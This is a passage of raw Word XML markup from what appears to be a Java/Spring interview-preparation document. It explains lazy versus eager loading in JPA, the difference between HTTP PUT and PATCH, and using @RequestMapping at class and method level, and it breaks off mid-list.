    <w:p w14:paraId="3DBED9B2" w14:textId="2FEAF7ED" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00163EF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="629" w:name="_Toc197867843"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference </w:t>
      </w:r>
      <w:r w:rsidR="000064A4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">between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azy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oading and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="000064A4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ager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oading</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="629"/>
    </w:p>
    <w:p w14:paraId="4CA57957" w14:textId="2CD35009"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 vs Eager Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032CDFF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Lazy Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6605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lazy loading, related entities are not loaded immediately when the parent entity is loaded. Instead, they are loaded only when they are accessed for the first time (on-demand).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EBF1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you access a related entity for the first time (e.g., through a getter method), a database query is executed to fetch the related entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548D7AF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only be fetched when you try to access order.getCustomer().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEFC8D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p w14:paraId="0FF7C32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et&lt;Order&gt; orders;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05B49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orders are fetched only when accessed in the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EDB20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ager Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D3F16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eager loading, related entities are loaded immediately along with the parent entity. The related entities are fetched in the same query or in a join query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE149C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the parent entity is fetched, the related entities are fetched at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD8EC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be fetched immediately with a join.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520613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yToOne(fetch = FetchType.EAGER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E290B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Customer customer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ADC9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Customer is fetched as soon as the Order is fetched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012502DE"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7FD89B">
          <v:rect id="_x0000_i2607" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EBB64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4256"/>
        <w:gridCol w:w="3860"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="014DF7BA" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04BB603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65D3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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="146EFF8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ager Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="24095EB4" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27253C9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hen related data is fetched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A9232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only when accessed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="359B5B4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immediately with the parent entity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="19D197C4" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1682E3C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 Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="366A03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aster initial load but may result in multiple queries (N+1 problem).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C057E7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lower initial load due to fetching all related data at once.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="5294A43D" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18B7E9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627F456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not always needed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4795A2D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always required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="56D23123" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B6D90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tch Type Annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25479E8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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4799154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EAGER)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="46A24B19" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58B3FE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 Queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C3A5F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y result in multiple queries (on-demand).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="365DC6D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ults in a single query or join query.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B27D6DF"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226B0C3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You load a Customer and only load the Orders when the customer.getOrders() method is accessed. If you never access the orders, they won't be fetched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC086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ager Loading</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You load a Customer, and the Orders are automatically loaded in the same query, even if you don't need the Orders in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FC706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4A6FC3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is recommended in cases where related entities are large and not always necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA6418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should be used when related entities are needed immediately or frequently, such as in scenarios where you always need the data (e.g., Order and Customer in an e-commerce system).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D2FE9" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C6790E"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In conclusion, the choice between </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Laz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w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> loading depends on the use case, performance considerations, and how frequently you access related entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5CC199" w14:textId="3E541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608" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B3A75D" w14:textId="066C4C53" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="000064A4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="630" w:name="_Toc197867844"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between </w:t>
      </w:r>
      <w:r w:rsidR="00355F67" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00355F67" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>PATCH</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="630"/>
    </w:p>
    <w:p w14:paraId="3FBACC4E" w14:textId="65935752"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fference between PUT and PATCH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3CA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are both HTTP methods used to update resources on a server, but they differ in how they perform the update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E12DE42"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1BE640">
          <v:rect id="_x0000_i2609" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E55CEB"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UT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2AA67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you send the complete representation of the resource. If the resource already exists, it is entirely replaced with the new data. If it doesn't exist, a new resource is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F63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idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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completely replace a resource or when you are sure that the entire resource needs to be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED6E8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a User resource, you would send the entire updated User data (e.g., name, email, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B538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users/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33393D8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F9ADA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23,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468771B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5522BDC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30D7EAB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5348E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CH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24201C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method is used for partial updates to an existing resource. It allows you to update only the fields that need modification, instead of sending the entire resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEBC9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you only send the specific fields that need to be updated. The server updates only the fields provided in the request, leaving the rest of the resource unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B0B1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not necessarily idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Repeating the same PATCH request may result in different outcomes depending on the implementation of the server and the data provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A866D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make partial updates to a resource, rather than replacing the entire resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7D0C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only the name of a User, you would send just the updated field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5E539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users/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA0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2432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ane Doe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B4B6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DB4CAF"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CF74D">
          <v:rect id="_x0000_i2610" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419CF8E"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973"/>
        <w:gridCol w:w="4911"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="5CA91389" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D3C6FB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295FC3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T</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EF8DFA8"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CH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="33BA9D5C" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D5F510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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CB34BD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ull update (replaces the entire resource)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75720F1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al update (only updates specified fields)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="0B04ED98" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1933936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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AAA02F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empotent (multiple requests yield the same result)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="173FF0C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necessarily idempotent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="6181B96E" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="571B97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 Sent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="589EDE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te representation of the resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61BB17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ly the fields that need to be updated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="48350CB3" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48B39D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2DB50B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full resource replacement or creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15891D4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partial updates where only some fields need modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="576E0BD8" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36351C0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2E81DD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resource/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47104D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resource/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33C93C67"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987F47B">
          <v:rect id="_x0000_i2611" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1F1A9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264B6D7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when the client needs to replace a resource entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B355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when only part of the resource needs to be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F474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ummary,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for full resource replacement, whil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for partial updates. Both methods are important in RESTful APIs, and the choice between them depends on the scope of the update being made.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE42082" w14:textId="49C4595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612" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B70DE0F" w14:textId="5128484F" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="008019C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="631" w:name="_Toc197867845"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we use @RequestMapping at class level and method level both</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="631"/>
    </w:p>
    <w:p w14:paraId="25D63BBB" w14:textId="0698C0B8"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es, you can use @RequestMapping at both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The behavior is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BE472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Class Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBBA0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class level, it is typically used to define a base URL or path for all the methods inside that class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7514637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URL will be prefixed to the URLs of the methods in that controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3980DD"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Method Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1158A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method level, it defines the specific HTTP request mapping (URL, HTTP method type, etc.) for that individual method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6382EB9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URL is combined with the class-level URL to form the complete endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3095C41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7C8FBEC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3197BDA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255286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69FB111B" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FCC240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GET requests to /api/hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358F1D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4E7DB5D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47B5F7E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2AF37F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7BC2FA" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F3DE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POST requests to /api/submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA3A5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0704CF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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA94E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20232C5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6928F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D54CB3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1904E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means all method-level mappings will be relative to /api.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D300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xact HTTP method and endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679ACCEC"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llo for a GET request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B457C5"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ubmit for a POST request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7997F8D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bining Class-Level and Method-Level @RequestMapping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5631DC2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serves as a base path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D840E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method in the controller can define its own path relative to the class-level base path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703EAB3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F3C54B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hello maps to the hello() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BFA8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submit maps to the submitData() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D16F065"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sing Both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24114D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rganization</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can group related methods under a common base path, making your code cleaner and more maintainable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D136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fine-tune individual method mappings while maintaining a common base path for all methods in a controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6324F7A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ote:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3CFCF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also supports more specialized annotations such as:</w:t>
      </w:r>
